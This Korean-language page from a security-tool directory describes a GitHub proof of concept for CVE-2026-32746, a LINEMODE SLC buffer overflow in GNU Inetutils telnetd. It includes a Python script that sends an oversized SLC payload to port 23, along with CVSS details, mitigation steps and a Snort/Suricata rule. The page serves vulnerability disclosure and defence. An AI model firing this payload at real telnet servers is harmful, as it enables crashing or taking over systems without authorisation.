Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-32746 — # CVE-2026-32746 개념 증명 익스플로잇 GNU Inetutils telnetd의 LINEMODE SLC 버퍼 오버플로우를 통한 치명적인 원격 코드 실행 취약점에 대한 개념 증명 익스플로잇입니다. 기술 분석, CVSS 지표 및 완화 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/kaleth4/cve-2026-32746
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

# CVE-2026-32746 개념 증명 익스플로잇 GNU Inetutils telnetd의 LINEMODE SLC 버퍼 오버플로우를 통한 치명적인 원격 코드 실행 취약점에 대한 개념 증명 익스플로잇입니다. 기술 분석, CVSS 지표 및 완화 지침을 포함합니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 요약

치명적 취약점 | CVSS 9.8 | 원격 코드 실행! 영향: GNU Inetutils Telnetd (2.7 이전 버전) 유형: LINEMODE SLC 하위 옵션 핸들러의 OOB Write 공격 벡터: 네트워크 (포트 23) | 인증 불필요 영향: Telnetd 프로세스 권한으로 RCE


🎯 📖 기술 설명

GNU Inetutils의 telnetd 데몬에 있는 add_slc 함수에서 버퍼 오버플로우(경계 밖 쓰기, OOB Write) 가 발견되었습니다. 이 결함으로 인해 원격 공격자가 Telnet 프로토콜의 SLC(Set Local Characters) 하위 옵션을 조작하여 할 수 있습니다.

임의 코드를 주입

🔍 주요 세부 사항

  • 취약 함수: add_slc (로컬 문자 처리).
  • 근본 원인: 내부 버퍼의 경계 검증 부재.
  • 악용 방법: 악성 LINEMODE SLC 시퀀스 대량 전송.
  • 요구 사항: 없음 (포트 23 직접 접근).

🛠️ 💻 개념 증명 (PoC)

공격자는 내부 버퍼를 포화시키는 악성 Telnet 페이로드를 통해 이 취약점을 악용할 수 있습니다:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# add_slc를 오버플로우시키기 위해 생성된 페이로드
malicious_slc = b"\x01\x03\x41" * 600  # 600회 반복

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] {target}에 악성 페이로드 전송 중...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] 페이로드 전달 완료. 서비스 중단/RCE 확인 중...")

⚠️ 경고! 이 코드는 교육 및 연구 목적으로만 사용해야 합니다. 승인되지 않은 시스템에서의 사용은 불법입니다.


📊 📈 위험 지표 (CVSS 3.1)

메트릭값설명
벡터AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H원격, 인증 불필요
점수9.8 (치명적) 🔴기밀성, 무결성, 가용성에 높은 영향
공개일2026년 3월 13일최종 수정: 2026년 5월 5일

🛡️ 🔒 완화 및 해결 방안

🚀 즉시 해결

✅ GNU Inetutils를 패치된 버전(2.7 이후) 으로 업데이트.

⚡ 임시 대응

🔹 telnetd 비활성화 및 SSH로 전환 (권장). 🔹 경계 방화벽에서 포트 23 차단. 🔹 IDS/IPS 구성하여 비정상적인 LINEMODE SLC 시퀀스 탐지.

🛡️ 추가 보안 설정

  • Snort/Suricata 규칙:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
도구 다운로드